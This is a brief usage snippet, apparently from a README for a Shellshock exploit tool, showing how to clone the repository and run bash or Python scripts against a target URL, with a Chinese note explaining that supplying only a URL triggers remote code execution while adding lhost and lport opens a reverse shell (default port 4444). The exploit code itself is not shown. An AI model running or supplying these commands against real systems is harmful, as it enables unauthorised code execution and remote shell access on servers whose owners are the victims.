sudo git clone https://github.com/Gurguii/shellshock.sh
bash shellshock.sh -u <url> -h* <lhost> -p* <lport>
python3 shellshock.py -u <url> -lh* <lhost> -lp* <lport>
注意:默认 LPORT 为 4444,URL 为必填项。如果只提供 URL,则执行 RCE;否则,它将针对给定的 lhost 和 lport 执行 RSHELL。